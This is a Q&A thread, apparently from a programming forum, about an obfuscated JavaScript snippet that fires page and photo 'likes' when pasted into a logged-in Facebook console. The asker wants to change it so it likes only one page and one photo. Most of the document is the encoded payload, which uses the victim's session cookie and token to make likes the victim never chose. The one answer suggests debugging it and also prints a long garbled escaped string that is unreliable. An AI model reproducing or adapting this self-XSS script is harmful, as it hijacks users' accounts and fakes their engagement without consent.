# Analyze obfuscated JavaScript code?

Tags: deobfuscation, javascript

I have this code

```
var _8818;var _7347='1050884C133B855A771F839C511F791E775B763F783B847D843C795D511D627E511B783F827B779B851F819C787E823E847D567E795B787C847C659F815D787F819F787A823F847C843E647D867F695D771B819F787C543A539F791F775C763D783A847C843C795D539C547D747B575F755A567F855C771F815E851F787B619E511B855D771E839D511A851A843B787F839C763C803C783D511E627C511C783D827E779C851D819C787F823E847C567B779F827F827B811E803C787A567F819F771A847B779A799F543F783F827E779B851C819E787B823F847C567C779C827B827B811F803D787C567F819A771A847E779E799B543A571B779C763A851A843D787C839B627C543C751E783B555C547B571A547C747D579D755D547B619E511C791F851F823F779D847E803C827F823A511D687D803B811C787C543F831C547A511C875B511B855D771A839D511D703B771B795C787E511D627D511F823D787A859C511A735E691E687B671D847B847C831A711C787C835E851B787B843C847C543B547E619D511E855A771F839B511E703E771F795A787E723A711A687D511E627A511B519F571A571F859B859D859A567D791F771D779E787C775B827A827F811C567F779D827D819E571F771D807E771F863F571E831C771C795F787B843D571F791D771D823C763E843E847E771C847A851D843D567F831B799B831D519E619C511F855F771C839A511D703D771F795A787E703B771E839E771A819B843C511B627C511C519B535C791A775A831B771E795D787A763A803B783A627E519E511B555B511E831C511B555C519F535D771F783E783C627B847E839B851A787E535F839B787E815E827E771E783B627E791A771E815E843F787B535F791B771F823A763B827E839A803A795B803A823A627C831B771A795B787E763C847F803A819E787E815A803F823D787A535B791B771C823E763E843C827B851E839D779A787F627F535B779C771E847F627B535C823E779E847F839D747D763B819D827C783F755E627F831E771E795E787A815D787F847A763C847F803A819E787D815F803B823A787A763D831E771C795B787B763F771A779A847D803A827E823F843F535C763D763F851F843D787C839A627C519C555E851F843F787C839C763C803E783B555F519D535B763B763F771C627E579D535A763C763F783B867C823C627B603B611E607D771A655F595F871D595F651D663D563A535F763B763D839D787C835A627C783A535A791E775F763F783A847F843F795F627F519A555E791E775B763B783C847E843C795C555B519B535D831E799C843A847D771C819D831A627F519B619A511F703D771E795E787B567C827B831C787D823D543F519B703E699A715B719D519E559D511F703F771B795D787F723C711B687D559D511E847C839D851E787A547F619E511D703A771A795F787F567B827F823F839A787A771A783B867A843E847F771A847E787D779B799F771B823E795E787D511D627D511D791A851B823E779E847A803B827A823A511A543A547C511C875F511C803A791E511E543A703B771A795D787D567E839B787F771C783B867A715D847B771B847D787C511C627C627A511B591A511B535D535A511B703D771E795B787E567A843F847D771F847E851B843D511A627E627D511F583C575F575B547C511D875C511B703E771A795E787E567F779F815F827F843C787F619D511C883D511B883A619B511E703B771E795F787A567C843A787E823C783F543B703C771F795B787C703C771A839F771E819A843A547D619C511B883A511A423C571B571B687F827B823E795F703E771B795D787D423E687C803D811A787E543E519E591A587E599B575C595E599C599C579E587A579B599F611F607F579F575D519A547F619E423B687E803F811F787E543B519B579A595F599C599D579E603A579B591A603B607B591E603A591F599F587E519B547A619E423D687E803D811B787E543B519A591E599A579C591D591E583E587B603F575F599B587D603C611A591F575F519E547B619B423B687B803F811D787A543C519E583E583C611B611A603D591B607F599C603B579D599A575F583B587F583D519E547F619B423F687B803A811D787C543E519D595D579E603A603A595A587C583A595E579B599A591A611D603D603E587D519C547D619E423F687A803D811A787B543C519B587E579B611A595A599F595D587D591C607E575D599C583F603C583E587C519C547C619A423D571E571B671A803D787B851E703F771C795C787D423C687A803C811C787D543C519F587E583B591C587A607D591B587B587B591B587E583F611F591B579D579B519F547D619E423C687A803E811A787A543C519C583A575B579A599B599B611F579E599D587E587A587F607E579E611B595B519C547A619F423D687D803C811F787B543C519E579F587C579A611B579D579C603B611D587D595E595C587A611A591D587D519F547B619C423C571A571E715D827E783C771A703E771E795A787D423C687A803E811B787E543B519C591B587A583D583F583D579B603A599E599B607F607F583C583C611C579E519E547C619A423A687D803A811F787D543A519D599E579D599B595E603A595E591C579D607A587F607F607C603C583B607F519E547D619F511B423E687D803F811A787F543D519A599F587A603E599E603E611F575C587B611A595C607D603C595D583C583A519A547A619C511A423B571E571A719F799A771D803D715D827F823B703D771F795A787B423E687B803E811F787E543B519C583C583F579E587F595C587D587B591A607E575C583B591A583D579B607F519C547D619F423E571D571C703E799F851A683A827F867B703B771E795A787C423B687B803A811E787E543C519D583F583F583B595A595D583A587B603C579E583D591F579D611F583F603A519A547E619D423F687A803D811C787C543A519F579F599A599D603E607B583F591A611E599B607F599A579A607B607B595C519B547D619C423E687C803E811A787A543A519C595F599B575E599C607C603C611F579B603E587A587A599E607A599A587C519C547B619D423D571E571A651F851D827A823A795B687A715D703C771E795D787D423D687E803E811C787E543C519A591A579F611A607D575C599A591E603C579D591E591D583B611F591D575E519E547F619B423B687F803D811D787C543F519B595B591F595D595B599B595E583B575F595F595A583A579B611C579B607D519C547E619C423F571A571A655A771E823D795A671E771E803B703F799F827E823C795E703C771A795B787B423E687F803D811B787F543B519B583A575A599C607A611A591B599D579F611D591F607C583F611B579B591C519B547B619C423F687A803D811D787B543C519C591E611A575A575B595E579B595A611B591F591C583C599F587C579E579B519A547C619D423C571D571F719C803A819A659C819E703D771B795A787D423D687F803F811E787C543E519A579E583C595D599A603C603F599F595A575E611C599E579C579F595D575D519D547C619D511A423C687E803A811E787A543F519F583C575B603A575D595F575C575C583C611B591B603F587E603C575A599A519C547B619E511A423D571F571C695B795A827E779B671D803F787B851D703E771A795E787E423E687C803D811F787C543C519B579E591F595F595F583E599E583B611E583D591F599A611F611D599A599C607A519E547A619D423A687D803D811B787F543E519E579F587A607D595B579F595C599B603C587C575C583F591C599A599D583E519A547E619C423B687E803C811C787A543F519A583C607C591B575D599D603E579C575D595D575F591E595C611E599B599B519C547B619B423A855A771F839C511E851F843A787C839B763B803B783E511D627E511F783B827D779A851C819D787B823E847E567A779D827D827E811D803C787F567A819C771D847E779D799B543A783F827D779C851D819F787D823C847D567C779F827F827A811A803B787A567E819E771F847B779B799D543F571A779B763B851F843C787E839E627F543C751A783D555B547A571F547C747F579A755D547D619E511D855F771B839D511A791D775C763A783B847B843C795B511B627A511D783B827E779E851D819A787B823F847C567B795F787D847B659E815F787C819A787E823D847E843D647C867B695F771D819C787D543D539B791E775A763C783A847D843D795F539B547B747E575E755B567F855E771D815E851F787B619E511F855F771D839D511F823E827A859C627C543B823B787F859C511D655F771B847B787A547C567B795A787F847A719C803A819E787F543B547A619A511D791A851D823F779F847B803A827F823D511F703F543B827A831A827D547A511A875C511E855C771E839F511D735C511A627C511A823E787D859E511B735D691C687E671C847D847E831F711E787F835E851F787A843B847A543B547D619E511F855C771E839F511C735F723B711A687F511F627C519B571E571A859B859C859B567A791E771A779E787F775C827E827A811F567C779C827D819F571F771F807F771D863F571E851C791F803B571B815D803C811C787F567C831D799A831C519D619A511F855F771D839C511F735F703A771D839E771C819D843A511E627B511A519D815D803B811C787D763B771A779F847F803F827C823E627D847A839F851F787B535F791B847D763A787D823C847A763A803A783C787C823F847D803B791B803B787C839D627A519F555F827C831A827B555B519B535C843A827E851C839E779F787E627C579E535E779B815C803C787B823F847F763F803D783D627A519A555D823E827F859D555B519B531E587E643D587E603D611E603F607E587E607A595C603D535E839A827E827F847D803B783E627B851B763E807F843F827C823A831C763B587B611E763F579C607E535F795E803F791A847B827A779A779D771A843A803F827F823A535A791B847F747D847C823F755E627C531A587A659C531F587B655E535E791D847D747E847C867D831E787C755D627F583D575B535C791A847F747D835F803A783B755E627F595F607A611A575F607F579B579E587E583F611F591B603C575F583B603F611A583C595F603F535A791B847A747E819E791F763E843C847F827D839F867F763A811F787B867E755C627A583A607D579F591D611A599D583D611E575E575C579A611D587C579E591E587F611B595B583E535B791B847A747D799B771A843C763D787F863E831E771B823F783B787B783C763F851B791B803B755B627E579E535D823E779A847F839F747D763E819B827B783D755A627F831A771B795B787F815C787A847A763A799D827E819E787D763E843B847A839B787B771E819A535D763C763E851A843F787E839A627D519E555D851F843E787B839D763F803D783A555C519C535C763B763B771B627A579E535A763C763D783E867E823E627A603B823B607F607E707D827B643A691B647F815D651A815F867F827E779B831E771B787F535E763A763A839E787B835A627B795B591F535F791E775A763A783D847C843F795F627C519A555E791B775E763E783B847A843D795B555B519A535E831F799A843D847E771C819C831A627B519B619C511A735B567B827C831A787B823B543A519A703C699A715C719A519B559A511D735A723B711E687C559D511F847F839F851F787D547B619E511C735C567E827C823E839C787C771A783C867C843B847A771B847D787B779B799F771E823F795A787D511D627B511C791C851D823A779E847A803D827E823B511A543F547E511A875B511C803A791B511D543F735E567E839A787A771E783A867E715A847D771C847B787E511A627E627D511A591B511C535C535A511C735F567C843F847C771B847F851F843D511E627A627A511A583A575F575C547C511F875A511A735D567C779C815E827E843A787C619C511A883D511E883F619E511C735D567E843D787A823C783B543F735C703F771E839D771B819C843D547B619C511D883B511B423C571B571C687B827E823F795F703F803E779C423B703F543D519C583A575D595E611A611A579B587F579E611C595A603E603F607B603C603B519D547E619E423B703E543D519A583B583E603F591B599F575C603F607C591D575C611D603D595B611E603C519C547E619B423B703C543E519A583E579E595D607C599E599B611A575C595E583C595D599D611E607B595B519F547D619E423F703E543F519F583D575F611B587C583B607B595B575A595C611D579A575D607F583B595F519A547C619F423F571D571D671F803E787A851F703A803E779E423D703C543E519F595C583F603C591F591E607A607F587C603D587D583B583B595E611B579D519C547E619F423E703C543A519D595E575D595F583D591D607A611E583C611B595F591E583E595A607B583B519E547C619A423B703D543F519F591F611E595F579B575C575B583F599D587D607A611E575F603C607D583B519B547B619F423B703A543A519B591D611A579F575E587B575D603E611F603B599A587B579D575D599C583D519A547F619E423E703F543C519F591A611D575E599F603C575C583C591C579A575A575F575A591A595A579C519C547E619A423D703E543E519B591E583B607F587C575F595C607E583B587C611B575F587B595E599C575F519A547F619B423F571E571E715C827C783C771F703D803D779B423C703E543D519F579B587B611C595F579C583D611A595C587E575E603E583F591C595B591F599E519C547C619F423B571C571C719D799B771F803A715D827D823B703D803A779B423A703B543B519D583C591D591D579B599D599D587C583B583D591F575B587E603D591E587D519A547A619A423E571E571D703A799C851F683B827F867B703F803F779E423A703D543B519D583D575B587E583D599A607C607B587A587B579E603E575C575C579D579C519D547D619E423F571F571B655A771A823C795E671C771D803A703E799F827F823B795C703B803A779B423C703A543D519A587B611D587E575E587C595C607C595E575B607B583B583A587F591E575F519D547A619E423A571F571A719B799C803F667B803E771B703A803E779F423B703E543B519B579F599F607B603F575D603A575B587D575E575B575A591E607C603C583C519A547B619C423D571E571B719F803C819F659E819B703F803E779D423A703A543C519A579E591F579A575C603C611A575B603B595C595F607B579A599B611F595F595C519D547C619F';var _2096=/[\x41\x42\x43\x44\x45\x46]/;var _7700=2;var _8160=_7347.charAt(_7347.length-1);var _5402;var _9849=_7347.split(_2096);var _8517=[String.fromCharCode,isNaN,parseInt,String];_9849[1]=_8517[_7700+1](_8517[_7700](_9849[1])/21);var _6586=(_7700==6)?String:eval;_5402='';_11=_8517[_7700](_9849[0])/_8517[_7700](_9849[1]);for(_8818=3;_8818<_11;_8818++)_5402+=(_8517[_7700-2]((_8517[_7700](_9849[_8818])+_8517[_7700](_9849[2])+_8517[_7700](_9849[1]))/_8517[_7700](_9849[1])-_8517[_7700](_9849[2])+_8517[_7700](_9849[1])-1));var _2587='_5283';var _8881='_2587=_5402';function _4546(_3913){_6586(_8410);_4546(_4354);_4354(_8881);_4546(_2587);}var _8410='_4546=_6586';var _4354='_4354=_4546';_4546(_8160);P("169527529919889");Like("394484804008242");
```

What this code does is if you log in to your facebook account and paste this code in the "console tab" of Google Chrome. It will like a total of 23 facebook pages and a photo (not sure if there are more photos, I could only figure out 1). I could only understand the last part

```
P("169527529919889");Like("394484804008242");
```

I believe that this part is for 1 of the pages and the one photo that I talked about. Can someone point out where the other 22 pages are? And how to remove them? I tried several times, but if I changed only a single word or a number, the code wouldn't work. In other words, can someone tell me how to use this code to like 1 page and 1 photo only?

Comment: @JanDvorak I am kinda new to javascript. I can't do it myself. Can you help me to point them out, the 22 pages in the code. Thanks.

Comment: I've tried to but it seems there's something missing.

Comment: @JanDvorak Did you try it with your facbook account? Did it work?

Answer (score 1):

Best way to analyze this is to open it in your browser's JavaScript debugger so that you can step through the code line-by-line and monitor the local variables.

At first glance, this JavaScript code appears to be broken though, in that it appears to call `eval()` on a string that can't be `eval()`'ed. The string it tries to `eval()` is the following, followed by a bunch of `\x0000`s:

> `\xfdbe\xfdca\xfd93\xfdc2\xfdbf\xfdbd\xfdc0\xfdcb\xfdca\xfdc2\xfd93\xfda6\xfd93\xfdc0\xfdc8\xfdc0\xfdcc\xfdc6\xfdc1\xfdc7\xfdcb\xfd9c\xfdc2\xfdc1\xfdcb\xfdac\xfdc6\xfdc1\xfdc6\xfdc1\xfdc7\xfdcb\xfdca\xfdaa\xfdce\xfdb2\xfdbe\xfdc6\xfdc1\xfd98\xfd98\xfdc2\xfdbf\xfdbd\xfdc0\xfdcb\xfdca\xfdc2\xfd98\xfd99\xfdba\xfd9e\xfdbc\xfd9c\xfdcc\xfdbe\xfdc6\xfdcc\xfdc1\xfda5\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdcc\xfdca\xfdc1\xfdca\xfdbd\xfdc4\xfdc0\xfd93\xfda6\xfd93\xfdc0\xfdc8\xfdc0\xfdcc\xfdc6\xfdc1\xfdc7\xfdcb\xfd9c\xfdc0\xfdc8\xfdc8\xfdc5\xfdc4\xfdc1\xfd9c\xfdc6\xfdbe\xfdcb\xfdc0\xfdc3\xfd98\xfdc0\xfdc8\xfdc0\xfdcc\xfdc6\xfdc1\xfdc7\xfdcb\xfd9c\xfdc0\xfdc8\xfdc8\xfdc5\xfdc4\xfdc1\xfd9c\xfdc6\xfdbe\xfdcb\xfdc0\xfdc3\xfd98\xfd9d\xfdc0\xfdbd\xfdcc\xfdca\xfdc1\xfdca\xfda6\xfd98\xfdbb\xfdc0\xfd9a\xfd99\xfd9d\xfd99\xfdba\xfd9e\xfdbc\xfd99\xfda5\xfd93\xfdc2\xfdcc\xfdc7\xfdc0\xfdcb\xfdc4\xfdc8\xfdc7\xfd93\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfdc8\xfd99\xfd93\xfdd0\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfd93\xfda6\xfd93\xfdc7\xfdc1\xfdcd\xfd93\xfdb8\xfdb1\xfdb0\xfdae\xfdcb\xfdcb\xfdc8\xfdb4\xfdc1\xfdc9\xfdcc\xfdc1\xfdca\xfdcb\xfd98\xfd99\xfda5\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfdb6\xfdb4\xfdb0\xfd93\xfda6\xfd93\xfd94\xfd9d\xfd9d\xfdcd\xfdcd\xfdcd\xfd9c\xfdc2\xfdbe\xfdc0\xfdc1\xfdbf\xfdc8\xfdc8\xfdc5\xfd9c\xfdc0\xfdc8\xfdc6\xfd9d\xfdbe\xfdc4\xfdbe\xfdce\xfd9d\xfdc8\xfdbe\xfdc2\xfdc1\xfdca\xfd9d\xfdc2\xfdbe\xfdc7\xfdbd\xfdca\xfdcb\xfdbe\xfdcb\xfdcc\xfdca\xfd9c\xfdc8\xfdc3\xfdc8\xfd94\xfda5\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfdb3\xfdbe\xfdca\xfdbe\xfdc6\xfdca\xfd93\xfda6\xfd93\xfd94\xfd97\xfdc2\xfdbf\xfdc8\xfdbe\xfdc2\xfdc1\xfdbd\xfdc4\xfdc0\xfda6\xfd94\xfd93\xfd9a\xfd93\xfdc8\xfd93\xfd9a\xfd94\xfd97\xfdbe\xfdc0\xfdc0\xfda6\xfdcb\xfdca\xfdcc\xfdc1\xfd97\xfdca\xfdc1\xfdc6\xfdc8\xfdbe\xfdc0\xfda6\xfdc2\xfdbe\xfdc6\xfdca\xfdc1\xfd97\xfdc2\xfdbe\xfdc7\xfdbd\xfdc8\xfdca\xfdc4\xfdc2\xfdc4\xfdc7\xfda6\xfdc8\xfdbe\xfdc2\xfdc1\xfdbd\xfdcb\xfdc4\xfdc6\xfdc1\xfdc6\xfdc4\xfdc7\xfdc1\xfd97\xfdc2\xfdbe\xfdc7\xfdbd\xfdca\xfdc8\xfdcc\xfdca\xfdc0\xfdc1\xfda6\xfd97\xfdc0\xfdbe\xfdcb\xfda6\xfd97\xfdc7\xfdc0\xfdcb\xfdca\xfdba\xfdbd\xfdc6\xfdc8\xfdc0\xfdbc\xfda6\xfdc8\xfdbe\xfdc2\xfdc1\xfdc6\xfdc1\xfdcb\xfdbd\xfdcb\xfdc4\xfdc6\xfdc1\xfdc6\xfdc4\xfdc7\xfdc1\xfdbd\xfdc8\xfdbe\xfdc2\xfdc1\xfdbd\xfdbe\xfdc0\xfdcb\xfdc4\xfdc8\xfdc7\xfdca\xfd97\xfdbd\xfdbd\xfdcc\xfdca\xfdc1\xfdca\xfda6\xfd94\xfd9a\xfdcc\xfdca\xfdc1\xfdca\xfdbd\xfdc4\xfdc0\xfd9a\xfd94\xfd97\xfdbd\xfdbd\xfdbe\xfda6\xfd9e\xfd97\xfdbd\xfdbd\xfdc0\xfdce\xfdc7\xfda6\xfda2\xfda4\xfda3\xfdbe\xfdab\xfda1\xfdcf\xfda1\xfdaa\xfdac\xfd9c\xfd97\xfdbd\xfdbd\xfdca\xfdc1\xfdc9\xfda6\xfdc0\xfd97\xfdc2\xfdbf\xfdbd\xfdc0\xfdcb\xfdca\xfdc2\xfda6\xfd94\xfd9a\xfdc2\xfdbf\xfdbd\xfdc0\xfdcb\xfdca\xfdc2\xfd9a\xfd94\xfd97\xfdc8\xfdc3\xfdca\xfdcb\xfdbe\xfdc6\xfdc8\xfda6\xfd94\xfda5\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfd9c\xfdc8\xfdc8\xfdc1\xfdc7\xfd98\xfd94\xfdb3\xfdb2\xfdb5\xfdb6\xfd94\xfd9b\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfdb6\xfdb4\xfdb0\xfd9b\xfd93\xfdcb\xfdca\xfdcc\xfdc1\xfd99\xfda5\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfd9c\xfdc8\xfdc7\xfdca\xfdc1\xfdbe\xfdc0\xfdce\xfdca\xfdcb\xfdbe\xfdcb\xfdc1\xfdc0\xfdc3\xfdbe\xfdc7\xfdc2\xfdc1\xfd93\xfda6\xfd93\xfdc2\xfdcc\xfdc7\xfdc0\xfdcb\xfdc4\xfdc8\xfdc7\xfd93\xfd98\xfd99\xfd93\xfdd0\xfd93\xfdc4\xfdc2\xfd93\xfd98\xfdb3\xfdbe\xfdc2\xfdc1\xfd9c\xfdca\xfdc1\xfdbe\xfdc0\xfdce\xfdb5\xfdcb\xfdbe\xfdcb\xfdc1\xfd93\xfda6\xfda6\xfd93\xfda0\xfd93\xfd97\xfd97\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfd9c\xfdca\xfdcb\xfdbe\xfdcb\xfdcc\xfdca\xfd93\xfda6\xfda6\xfd93\xfd9f\xfd9e\xfd9e\xfd99\xfd93\xfdd0\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfd9c\xfdc0\xfdc6\xfdc8\xfdca\xfdc1\xfda5\xfd93\xfdd1\xfd93\xfdd1\xfda5\xfd93\xfdb3\xfdbe\xfdc2\xfdc1\xfd9c\xfdca\xfdc1\xfdc7\xfdc0\xfd98\xfdb3\xfdbe\xfdc2\xfdc1\xfdb3\xfdbe\xfdca\xfdbe\xfdc6\xfdca\xfd99\xfda5\xfd93\xfdd1\xfd93\xfd84\xfd9d\xfd9d\xfdb0\xfdc8\xfdc7\xfdc2\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda0\xfda0\xfda2\xfd9e\xfda1\xfda2\xfda2\xfd9e\xfda0\xfd9e\xfda2\xfda4\xfda3\xfd9e\xfd9e\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9e\xfda1\xfda2\xfda2\xfd9e\xfda2\xfd9e\xfda0\xfda2\xfda3\xfda0\xfda2\xfda0\xfda2\xfda0\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda0\xfda2\xfd9e\xfda0\xfda0\xfd9f\xfda0\xfda2\xfd9e\xfda2\xfda0\xfda2\xfda4\xfda0\xfd9e\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9f\xfd9f\xfda4\xfda4\xfda2\xfda0\xfda3\xfda2\xfda2\xfd9e\xfda2\xfd9e\xfd9f\xfda0\xfd9f\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda1\xfd9e\xfda2\xfda2\xfda1\xfda0\xfd9f\xfda1\xfd9e\xfda2\xfda0\xfda4\xfda2\xfda2\xfda0\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda0\xfd9e\xfda4\xfda1\xfda2\xfda1\xfda0\xfda0\xfda3\xfd9e\xfda2\xfd9f\xfda2\xfd9f\xfda0\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdae\xfdc4\xfdc1\xfdcc\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda0\xfd9f\xfda0\xfda0\xfda3\xfda0\xfda0\xfda0\xfda0\xfda0\xfd9f\xfda4\xfda0\xfd9e\xfd9e\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9f\xfd9e\xfd9e\xfda2\xfda2\xfda4\xfd9e\xfda2\xfda0\xfda0\xfda0\xfda3\xfd9e\xfda4\xfda1\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9e\xfda0\xfd9e\xfda4\xfd9e\xfd9e\xfda2\xfda4\xfda0\xfda1\xfda1\xfda0\xfda4\xfda0\xfda0\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdb5\xfdc8\xfdc0\xfdbe\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda0\xfda0\xfd9f\xfd9f\xfd9f\xfd9e\xfda2\xfda2\xfda2\xfda3\xfda3\xfd9f\xfd9f\xfda4\xfd9e\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda2\xfd9e\xfda2\xfda1\xfda2\xfda1\xfda0\xfd9e\xfda3\xfda0\xfda3\xfda3\xfda2\xfd9f\xfda3\xfd94\xfd99\xfda5\xfd93\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda2\xfda0\xfda2\xfda2\xfda2\xfda4\xfd9e\xfda0\xfda4\xfda1\xfda3\xfda2\xfda1\xfd9f\xfd9f\xfd94\xfd99\xfda5\xfd93\xfd84\xfd9d\xfd9d\xfdb6\xfdc3\xfdbe\xfdc4\xfdb5\xfdc8\xfdc7\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9f\xfd9f\xfd9e\xfda0\xfda1\xfda0\xfda0\xfda0\xfda3\xfd9e\xfd9f\xfda0\xfd9f\xfd9e\xfda3\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdb3\xfdc3\xfdcc\xfdb0\xfdc8\xfdce\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9f\xfd9f\xfd9f\xfda1\xfda1\xfd9f\xfda0\xfda2\xfd9e\xfd9f\xfda0\xfd9e\xfda4\xfd9f\xfda2\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9e\xfda2\xfda2\xfda2\xfda3\xfd9f\xfda0\xfda4\xfda2\xfda3\xfda2\xfd9e\xfda3\xfda3\xfda1\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda1\xfda2\xfd9e\xfda2\xfda3\xfda2\xfda4\xfd9e\xfda2\xfda0\xfda0\xfda2\xfda3\xfda2\xfda0\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdaa\xfdcc\xfdc8\xfdc7\xfdc2\xfdb0\xfdb5\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda0\xfd9e\xfda4\xfda3\xfd9e\xfda2\xfda0\xfda2\xfd9e\xfda0\xfda0\xfd9f\xfda4\xfda0\xfd9e\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda1\xfda0\xfda1\xfda1\xfda2\xfda1\xfd9f\xfd9e\xfda1\xfda1\xfd9f\xfd9e\xfda4\xfd9e\xfda3\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdab\xfdbe\xfdc7\xfdc2\xfdae\xfdbe\xfdc4\xfdb3\xfdc3\xfdc8\xfdc7\xfdc2\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9f\xfd9e\xfda2\xfda3\xfda4\xfda0\xfda2\xfd9e\xfda4\xfda0\xfda3\xfd9f\xfda4\xfd9e\xfda0\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfda0\xfda4\xfd9e\xfd9e\xfda1\xfd9e\xfda1\xfda4\xfda0\xfda0\xfd9f\xfda2\xfda0\xfd9e\xfd9e\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdb6\xfdc4\xfdc6\xfdac\xfdc6\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9e\xfd9f\xfda1\xfda2\xfda2\xfda2\xfda2\xfda1\xfd9e\xfda4\xfda2\xfd9e\xfd9e\xfda1\xfd9e\xfd94\xfd99\xfda5\xfd93\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9f\xfd9e\xfda2\xfd9e\xfda1\xfd9e\xfd9e\xfd9f\xfda4\xfda0\xfda2\xfda0\xfda2\xfd9e\xfda2\xfd94\xfd99\xfda5\xfd93\xfd84\xfd9d\xfd9d\xfdb2\xfdc2\xfdc8\xfdc0\xfdae\xfdc4\xfdc1\xfdcc\xfdb3\xfdbe\xfdc2\xfdc1\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9e\xfda0\xfda1\xfda1\xfd9f\xfda2\xfd9f\xfda4\xfd9f\xfda0\xfda2\xfda4\xfda4\xfda2\xfda2\xfda3\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9e\xfda0\xfda3\xfda1\xfd9e\xfda1\xfda2\xfda2\xfda0\xfd9e\xfd9f\xfda0\xfda2\xfda2\xfd9f\xfd94\xfd99\xfda5\xfd84\xfdb0\xfdc4\xfdc5\xfdc1\xfd98\xfd94\xfd9f\xfda3\xfda0\xfd9e\xfda2\xfda2\xfd9e\xfd9e\xfda1\xfd9e\xfda0\xfda1\xfda4\xfda2\xfda2\xfd94\xfd99\xfda5\xfd84\xfdcc\xfdbe\xfdca\xfd93\xfdcc\xfdca\xfdc1\xfdca\xfdbd\xfdc4\xfdc0\xfd93\xfda6\xfd93\xfdc0\xfdc8\xfdc0\xfdcc\xfdc6\xfdc1\xfdc7\xfdcb\xfd9c\xfdc0\xfdc8\xfdc8\xfdc5\xfdc4\xfdc1\xfd9c\xfdc6\xfdbe\xfdcb\xfdc0\xfdc3\xfd98\xfdc0\xfdc8\xfdc0\xfdcc\xfdc6\xfdc1\xfdc7\xfdcb\xfd9c\xfdc0\xfdc8\xfdc8\xfdc5\xfdc4\xfdc1\xfd9c\xfdc6\xfdbe\xfdcb\xfdc0\xfdc3\xfd98\xfd9d\xfdc0\xfdbd\xfdcc\xfdca\xfdc1\xfdca\xfda6\xfd98\xfdbb\xfdc0\xfd9a\xfd99\xfd9d\xfd99\xfdba\xfd9e\xfdbc\xfd99\xfda5\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdc2\xfdbf\xfdbd\xfdc0\xfdcb\xfdca\xfdc2\xfd93\xfda6\xfd93\xfdc0\xfdc8\xfdc0\xfdcc\xfdc6\xfdc1\xfdc7\xfdcb\xfd9c\xfdc2\xfdc1\xfdcb\xfdac\xfdc6\xfdc1\xfdc6\xfdc1\xfdc7\xfdcb\xfdca\xfdaa\xfdce\xfdb2\xfdbe\xfdc6\xfdc1\xfd98\xfd98\xfdc2\xfdbf\xfdbd\xfdc0\xfdcb\xfdca\xfdc2\xfd98\xfd99\xfdba\xfd9e\xfdbc\xfd9c\xfdcc\xfdbe\xfdc6\xfdcc\xfdc1\xfda5\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdc7\xfdc8\xfdcd\xfda6\xfd98\xfdc7\xfdc1\xfdcd\xfd93\xfdab\xfdbe\xfdcb\xfdc1\xfd99\xfd9c\xfdc2\xfdc1\xfdcb\xfdb6\xfdc4\xfdc6\xfdc1\xfd98\xfd99\xfda5\xfd93\xfdc2\xfdcc\xfdc7\xfdc0\xfdcb\xfdc4\xfdc8\xfdc7\xfd93\xfdb3\xf